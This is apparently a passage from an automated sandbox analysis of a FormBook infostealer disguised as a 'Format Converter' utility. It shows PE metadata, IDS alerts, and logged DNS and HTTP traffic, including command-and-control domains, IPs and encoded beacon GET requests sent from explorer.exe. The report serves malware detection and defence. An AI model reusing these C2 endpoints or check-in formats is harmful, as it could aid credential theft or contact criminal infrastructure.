                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x903280x53.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x800.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x8e3840x8e400False0.882462379174data7.7978615602IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x920000x8000x800False0.3447265625data3.53195008008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x940000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_VERSION0x920900x3d4data
                                                                                    RT_MANIFEST0x924740x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    Translation0x0000 0x04b0
                                                                                    LegalCopyrightCopyright 2018
                                                                                    Assembly Version1.0.0.0
                                                                                    InternalNameAssemblyTitleAttribute.exe
                                                                                    FileVersion1.0.0.0
                                                                                    CompanyNameBobbleSoft
                                                                                    LegalTrademarks
                                                                                    CommentsConverts one textual format to another.
                                                                                    ProductNameFormat Converter
                                                                                    ProductVersion1.0.0.0
                                                                                    FileDescriptionFormat Converter
                                                                                    OriginalFilenameAssemblyTitleAttribute.exe

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    04/08/21-10:48:49.840874TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3108.128.238.226
                                                                                    04/08/21-10:48:49.840874TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3108.128.238.226
                                                                                    04/08/21-10:48:49.840874TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3108.128.238.226
                                                                                    04/08/21-10:49:05.183074TCP1201ATTACK-RESPONSES 403 Forbidden804973734.102.136.180192.168.2.3
                                                                                    04/08/21-10:49:57.294074TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3208.91.197.91
                                                                                    04/08/21-10:49:57.294074TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3208.91.197.91
                                                                                    04/08/21-10:49:57.294074TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.3208.91.197.91
                                                                                    04/08/21-10:50:08.043181TCP1201ATTACK-RESPONSES 403 Forbidden804974534.102.136.180192.168.2.3
                                                                                    04/08/21-10:50:13.109870TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.334.102.136.180
                                                                                    04/08/21-10:50:13.109870TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.334.102.136.180
                                                                                    04/08/21-10:50:13.109870TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.334.102.136.180
                                                                                    04/08/21-10:50:13.227869TCP1201ATTACK-RESPONSES 403 Forbidden804974634.102.136.180192.168.2.3

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 8, 2021 10:48:49.800071955 CEST4972780192.168.2.3108.128.238.226
                                                                                    Apr 8, 2021 10:48:49.840373993 CEST8049727108.128.238.226192.168.2.3
                                                                                    Apr 8, 2021 10:48:49.840626955 CEST4972780192.168.2.3108.128.238.226
                                                                                    Apr 8, 2021 10:48:49.840873957 CEST4972780192.168.2.3108.128.238.226
                                                                                    Apr 8, 2021 10:48:49.881361008 CEST8049727108.128.238.226192.168.2.3
                                                                                    Apr 8, 2021 10:48:49.881459951 CEST8049727108.128.238.226192.168.2.3
                                                                                    Apr 8, 2021 10:48:49.881586075 CEST4972780192.168.2.3108.128.238.226
                                                                                    Apr 8, 2021 10:48:49.881968021 CEST4972780192.168.2.3108.128.238.226
                                                                                    Apr 8, 2021 10:48:49.921756983 CEST8049727108.128.238.226192.168.2.3
                                                                                    Apr 8, 2021 10:49:04.986361027 CEST4973780192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:49:04.998783112 CEST804973734.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:49:04.998888016 CEST4973780192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:49:04.999016047 CEST4973780192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:49:05.011384964 CEST804973734.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:49:05.183073997 CEST804973734.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:49:05.183109045 CEST804973734.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:49:05.183301926 CEST4973780192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:49:05.183351040 CEST4973780192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:49:05.196171045 CEST804973734.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:49:25.580018044 CEST4973880192.168.2.391.121.60.23
                                                                                    Apr 8, 2021 10:49:28.581443071 CEST4973880192.168.2.391.121.60.23
                                                                                    Apr 8, 2021 10:49:34.581850052 CEST4973880192.168.2.391.121.60.23
                                                                                    Apr 8, 2021 10:49:48.670568943 CEST4974180192.168.2.391.121.60.23
                                                                                    Apr 8, 2021 10:49:51.677001953 CEST4974180192.168.2.391.121.60.23
                                                                                    Apr 8, 2021 10:49:51.767041922 CEST4974280192.168.2.33.13.255.157
                                                                                    Apr 8, 2021 10:49:51.877587080 CEST80497423.13.255.157192.168.2.3
                                                                                    Apr 8, 2021 10:49:51.877728939 CEST4974280192.168.2.33.13.255.157
                                                                                    Apr 8, 2021 10:49:51.877827883 CEST4974280192.168.2.33.13.255.157
                                                                                    Apr 8, 2021 10:49:51.988086939 CEST80497423.13.255.157192.168.2.3
                                                                                    Apr 8, 2021 10:49:51.988156080 CEST80497423.13.255.157192.168.2.3
                                                                                    Apr 8, 2021 10:49:51.988187075 CEST80497423.13.255.157192.168.2.3
                                                                                    Apr 8, 2021 10:49:51.988426924 CEST4974280192.168.2.33.13.255.157
                                                                                    Apr 8, 2021 10:49:51.988699913 CEST4974280192.168.2.33.13.255.157
                                                                                    Apr 8, 2021 10:49:52.099188089 CEST80497423.13.255.157192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.147592068 CEST4974380192.168.2.3208.91.197.91
                                                                                    Apr 8, 2021 10:49:57.293652058 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.293806076 CEST4974380192.168.2.3208.91.197.91
                                                                                    Apr 8, 2021 10:49:57.294074059 CEST4974380192.168.2.3208.91.197.91
                                                                                    Apr 8, 2021 10:49:57.440273046 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.479624987 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.479655981 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.479671001 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.479830980 CEST4974380192.168.2.3208.91.197.91
                                                                                    Apr 8, 2021 10:49:57.480165005 CEST4974380192.168.2.3208.91.197.91
                                                                                    Apr 8, 2021 10:49:57.514394045 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.514514923 CEST4974380192.168.2.3208.91.197.91
                                                                                    Apr 8, 2021 10:49:57.626471996 CEST8049743208.91.197.91192.168.2.3
                                                                                    Apr 8, 2021 10:49:57.693111897 CEST4974180192.168.2.391.121.60.23
                                                                                    Apr 8, 2021 10:50:02.625783920 CEST4974480192.168.2.3152.44.33.193
                                                                                    Apr 8, 2021 10:50:02.736835957 CEST8049744152.44.33.193192.168.2.3
                                                                                    Apr 8, 2021 10:50:02.737078905 CEST4974480192.168.2.3152.44.33.193
                                                                                    Apr 8, 2021 10:50:02.737376928 CEST4974480192.168.2.3152.44.33.193
                                                                                    Apr 8, 2021 10:50:02.848086119 CEST8049744152.44.33.193192.168.2.3
                                                                                    Apr 8, 2021 10:50:02.848124027 CEST8049744152.44.33.193192.168.2.3
                                                                                    Apr 8, 2021 10:50:02.848407984 CEST8049744152.44.33.193192.168.2.3
                                                                                    Apr 8, 2021 10:50:02.848552942 CEST4974480192.168.2.3152.44.33.193
                                                                                    Apr 8, 2021 10:50:02.848601103 CEST4974480192.168.2.3152.44.33.193
                                                                                    Apr 8, 2021 10:50:02.959345102 CEST8049744152.44.33.193192.168.2.3
                                                                                    Apr 8, 2021 10:50:07.914855003 CEST4974580192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:07.927746058 CEST804974534.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:07.927865982 CEST4974580192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:07.928015947 CEST4974580192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:07.940891981 CEST804974534.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:08.043180943 CEST804974534.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:08.043205023 CEST804974534.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:08.043450117 CEST4974580192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:08.043561935 CEST4974580192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:08.056231022 CEST804974534.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:13.097506046 CEST4974680192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:13.109659910 CEST804974634.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:13.109781027 CEST4974680192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:13.109869957 CEST4974680192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:13.122262001 CEST804974634.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:13.227869034 CEST804974634.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:13.227902889 CEST804974634.102.136.180192.168.2.3
                                                                                    Apr 8, 2021 10:50:13.228168011 CEST4974680192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:13.228198051 CEST4974680192.168.2.334.102.136.180
                                                                                    Apr 8, 2021 10:50:13.241094112 CEST804974634.102.136.180192.168.2.3

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 8, 2021 10:47:43.767472982 CEST4919953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:47:43.780256987 CEST53491998.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:47:44.549355984 CEST5062053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:47:44.562393904 CEST53506208.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:47:45.390475035 CEST6493853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:47:45.403153896 CEST53649388.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:47:46.167490959 CEST6015253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:47:46.180757999 CEST53601528.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:47:47.192456007 CEST5754453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:47:47.205771923 CEST53575448.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:02.979878902 CEST5598453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:02.992888927 CEST53559848.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:06.020994902 CEST6418553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:06.033951044 CEST53641858.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:09.686635971 CEST6511053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:09.704866886 CEST53651108.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:11.232563972 CEST5836153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:11.245111942 CEST53583618.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:12.179533958 CEST6349253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:12.192090034 CEST53634928.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:13.244406939 CEST6083153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:13.256509066 CEST53608318.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:14.543807983 CEST6010053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:14.557054996 CEST53601008.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:15.705270052 CEST5319553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:15.717885971 CEST53531958.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:16.424599886 CEST5014153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:16.439021111 CEST53501418.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:23.047386885 CEST5302353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:23.059376955 CEST53530238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:26.042622089 CEST4956353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:26.056108952 CEST53495638.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:27.773591995 CEST5135253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:27.786364079 CEST53513528.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:28.509497881 CEST5934953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:28.521418095 CEST53593498.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:29.507829905 CEST5708453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:29.521481037 CEST53570848.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:31.422092915 CEST5882353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:31.435568094 CEST53588238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:32.741475105 CEST5756853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:32.754563093 CEST53575688.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:45.363080978 CEST5054053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:45.375853062 CEST53505408.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:49.768059015 CEST5436653192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:49.792867899 CEST53543668.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:54.115600109 CEST5303453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:54.141582966 CEST53530348.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:48:59.911103010 CEST5776253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:48:59.928137064 CEST53577628.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:00.875983953 CEST5543553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:00.893342018 CEST53554358.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:03.917886972 CEST5071353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:03.935990095 CEST53507138.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:04.962331057 CEST5613253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:04.985348940 CEST53561328.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:10.193857908 CEST5898753192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:10.225215912 CEST53589878.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:15.242029905 CEST5657953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:15.273442030 CEST53565798.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:20.325412035 CEST6063353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:20.389976025 CEST53606338.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:25.399233103 CEST6129253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:25.577531099 CEST53612928.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:36.198688030 CEST6361953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:36.211636066 CEST53636198.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:38.135968924 CEST6493853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:38.162513971 CEST53649388.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:48.474037886 CEST6194653192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:48.640762091 CEST53619468.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:51.644726038 CEST6491053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:51.765275002 CEST53649108.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:49:56.999083042 CEST5212353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:49:57.145478964 CEST53521238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:50:02.496042013 CEST5613053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:50:02.623742104 CEST53561308.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:50:07.879797935 CEST5633853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:50:07.913424969 CEST53563388.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:50:13.057121038 CEST5942053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:50:13.096925020 CEST53594208.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 10:50:18.242928028 CEST5878453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 10:50:18.266840935 CEST53587848.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Apr 8, 2021 10:48:49.768059015 CEST192.168.2.38.8.8.80x49daStandard query (0)www.nahomredda.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:48:59.911103010 CEST192.168.2.38.8.8.80x2c82Standard query (0)www.paintersdistrictcouncil.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:04.962331057 CEST192.168.2.38.8.8.80x5440Standard query (0)www.nfoptic.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:10.193857908 CEST192.168.2.38.8.8.80xabbbStandard query (0)www.pvplearing.netA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:15.242029905 CEST192.168.2.38.8.8.80x367cStandard query (0)www.bancosecurity.websiteA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:20.325412035 CEST192.168.2.38.8.8.80x7b39Standard query (0)www.evonnemccray.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:25.399233103 CEST192.168.2.38.8.8.80x7f30Standard query (0)www.support-applela.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:48.474037886 CEST192.168.2.38.8.8.80x4a0bStandard query (0)www.support-applela.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:51.644726038 CEST192.168.2.38.8.8.80x61caStandard query (0)www.pone2.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:56.999083042 CEST192.168.2.38.8.8.80x2107Standard query (0)www.newmandu.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:02.496042013 CEST192.168.2.38.8.8.80x5799Standard query (0)www.bestwishesforyou.onlineA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:07.879797935 CEST192.168.2.38.8.8.80xe5d5Standard query (0)www.unclejoeandkamala2020.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:13.057121038 CEST192.168.2.38.8.8.80x7e01Standard query (0)www.siloamtree.comA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:18.242928028 CEST192.168.2.38.8.8.80x271cStandard query (0)www.trumedenroll.comA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Apr 8, 2021 10:48:49.792867899 CEST8.8.8.8192.168.2.30x49daNo error (0)www.nahomredda.comcname.landingi.comCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:48:49.792867899 CEST8.8.8.8192.168.2.30x49daNo error (0)cname.landingi.com108.128.238.226A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:48:49.792867899 CEST8.8.8.8192.168.2.30x49daNo error (0)cname.landingi.com54.77.19.84A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:48:49.792867899 CEST8.8.8.8192.168.2.30x49daNo error (0)cname.landingi.com52.212.68.12A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:48:59.928137064 CEST8.8.8.8192.168.2.30x2c82Name error (3)www.paintersdistrictcouncil.comnonenoneA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:04.985348940 CEST8.8.8.8192.168.2.30x5440No error (0)www.nfoptic.comnfoptic.comCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:04.985348940 CEST8.8.8.8192.168.2.30x5440No error (0)nfoptic.com34.102.136.180A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:10.225215912 CEST8.8.8.8192.168.2.30xabbbName error (3)www.pvplearing.netnonenoneA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:15.273442030 CEST8.8.8.8192.168.2.30x367cName error (3)www.bancosecurity.websitenonenoneA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:20.389976025 CEST8.8.8.8192.168.2.30x7b39Name error (3)www.evonnemccray.comnonenoneA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:25.577531099 CEST8.8.8.8192.168.2.30x7f30No error (0)www.support-applela.com91.121.60.23A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:48.640762091 CEST8.8.8.8192.168.2.30x4a0bNo error (0)www.support-applela.com91.121.60.23A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:51.765275002 CEST8.8.8.8192.168.2.30x61caNo error (0)www.pone2.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:51.765275002 CEST8.8.8.8192.168.2.30x61caNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:51.765275002 CEST8.8.8.8192.168.2.30x61caNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:51.765275002 CEST8.8.8.8192.168.2.30x61caNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:49:57.145478964 CEST8.8.8.8192.168.2.30x2107No error (0)www.newmandu.com208.91.197.91A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:02.623742104 CEST8.8.8.8192.168.2.30x5799No error (0)www.bestwishesforyou.onlinebestwishesforyou.onlineCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:02.623742104 CEST8.8.8.8192.168.2.30x5799No error (0)bestwishesforyou.online152.44.33.193A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:07.913424969 CEST8.8.8.8192.168.2.30xe5d5No error (0)www.unclejoeandkamala2020.comunclejoeandkamala2020.comCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:07.913424969 CEST8.8.8.8192.168.2.30xe5d5No error (0)unclejoeandkamala2020.com34.102.136.180A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:13.096925020 CEST8.8.8.8192.168.2.30x7e01No error (0)www.siloamtree.comsiloamtree.comCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:13.096925020 CEST8.8.8.8192.168.2.30x7e01No error (0)siloamtree.com34.102.136.180A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:18.266840935 CEST8.8.8.8192.168.2.30x271cNo error (0)www.trumedenroll.comtrumedenroll.comCNAME (Canonical name)IN (0x0001)
                                                                                    Apr 8, 2021 10:50:18.266840935 CEST8.8.8.8192.168.2.30x271cNo error (0)trumedenroll.com184.168.131.241A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.nahomredda.com
                                                                                    • www.nfoptic.com
                                                                                    • www.pone2.com
                                                                                    • www.newmandu.com
                                                                                    • www.bestwishesforyou.online
                                                                                    • www.unclejoeandkamala2020.com
                                                                                    • www.siloamtree.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349727108.128.238.22680C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:48:49.840873957 CEST1432OUTGET /vu9b/?uZQL2=D48x&0pn=epJyvIJN9OiI2pb9nHYNHIQUuRpQuBcV3xjjobJny1KcYNO6WcXhtFEWRhmWC8oG0KHq HTTP/1.1
                                                                                    Host: www.nahomredda.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:48:49.881361008 CEST1432INHTTP/1.1 301 Moved Permanently
                                                                                    content-length: 0
                                                                                    location: https://www.nahomredda.com/vu9b/?uZQL2=D48x&0pn=epJyvIJN9OiI2pb9nHYNHIQUuRpQuBcV3xjjobJny1KcYNO6WcXhtFEWRhmWC8oG0KHq
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.34973734.102.136.18080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:49:04.999016047 CEST4118OUTGET /vu9b/?0pn=TnflO2yLdbi4Ns0f55IiNebWCRsDsubrkj3vpv5xkUkHd7zC3bp6KG+yVlLNRE0xHemI&uZQL2=D48x HTTP/1.1
                                                                                    Host: www.nfoptic.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:49:05.183073997 CEST4118INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Thu, 08 Apr 2021 08:49:05 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "606abe80-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
